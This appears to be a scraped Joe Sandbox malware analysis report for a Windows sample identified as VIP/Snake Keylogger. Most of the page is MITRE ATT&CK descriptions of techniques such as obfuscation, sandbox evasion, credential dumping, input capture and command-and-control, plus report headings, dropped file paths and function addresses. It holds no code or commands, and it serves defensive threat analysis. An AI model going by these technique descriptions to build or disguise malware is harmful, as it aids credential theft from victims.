Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report lsc5QN46NH.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\aut8912.tmp

C:\Users\user\AppData\Local\Temp\palladize

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Windows Analysis Report
lsc5QN46NH.exe

Function 00603B3A Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153
windowCOMMON

Function 006049A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Function 00604E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Function 00669155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Function 0060301C Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73
windowregistryCOMMON

Function 00603041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Function 0060708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 00603633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
windowtimeregistryCOMMON

Function 00603A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Function 00603766 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267
COMMON

Function 0060F76F Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168
comCOMMON

Function 01644350 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 006039D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 01644110 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 150
fileCOMMON

Function 0060407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre